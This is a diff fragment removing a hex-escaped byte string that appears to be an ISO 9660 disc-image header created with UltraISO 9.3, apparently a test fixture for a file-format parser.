-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x9E\xDC\x20\x94\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\x18\xF5".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\xBF\x79\x60\xA1\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\x0C\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x21\xA5\x40\x35".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB3\xDD".
-	        "\xDA\x20\x4D\x49\x24\xB4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x97\x65\xC5\xC2\x52\xE6\x00\x43\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x93\x49\x24\x5D\xB2\x05\x05\x11\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8F\x90\xC9\xC1\x46\x12\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x15\x01".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x0F\xB9\xB0\xF1\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xED\xF5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\xD6\xCD\x0E\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\xF5\xF8\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1E\x6F\x7D\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x92\xD6\x14\x4E\xE5\xCA\x63\x52\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\xF2\x65\x79\xC2\x8B\xE6\x00\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x22\x27\xD6\xF9\x89\xE3\x7D\x3D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1F\x90\x81\xC1\x9E\x12".
-	        "\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x16\x01\x01\x43\x44\x30\x30\x31\x01\x00\x57\x49\x4E\x33\x32\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x32\x30\x30\x39\x30\x34\x30\x32".
-	        "\x5F\x30\x33\x31\x34\x30\x34\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x22\x00\x00\x00\x00\x00\x00\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x01\x01\x00\x00\x01\x00\x08\x08\x00\x32\x00\x00\x00\x00\x00\x00\x32\x13\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x22\x00\x17\x00\x00\x00\x00\x00\x00\x17\x00\x08\x00\x00\x00\x00\x08\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x02\x00\x00\x01\x00\x00\x01\x01\x00\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x55\x4C\x54\x52\x41\x49\x53\x4F\x20\x56\x39\x2E\x33\x20\x43\x44\x20\x26".
-	        "\x20\x44\x56\x44\x20\x43\x52\x45\x41\x54\x4F\x52\x2C\x20\x28\x43\x29\x32\x30\x30\x39\x20\x45\x5A\x42\x20\x53\x59\x53\x54\x45\x4D".
-	        "\x53\x2C\x20\x49\x4E\x43\x2E\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x32\x30\x30".
-	        "\x39\x30\x34\x30\x32\x30\x33\x31\x35\x30\x36\x30\x30\xE0\x32\x30\x30\x39\x30\x34\x30\x32\x30\x33\x31\x35\x30\x36\x30\x30\xE0\x30".
-	        "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x00\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30".
-	        "\x00\x01\x00\x55\x4C\x54\x52\x41\x49\x53\x4F\x00\x39\x2E\x33\x2E\x33\x2E\x32\x36\x38\x35\x00\xC8\x14\x05\x00\x00\x00\x00\x00\x1F".
-	        "\x00\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
-	        "\x20\x20\x20\x2F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
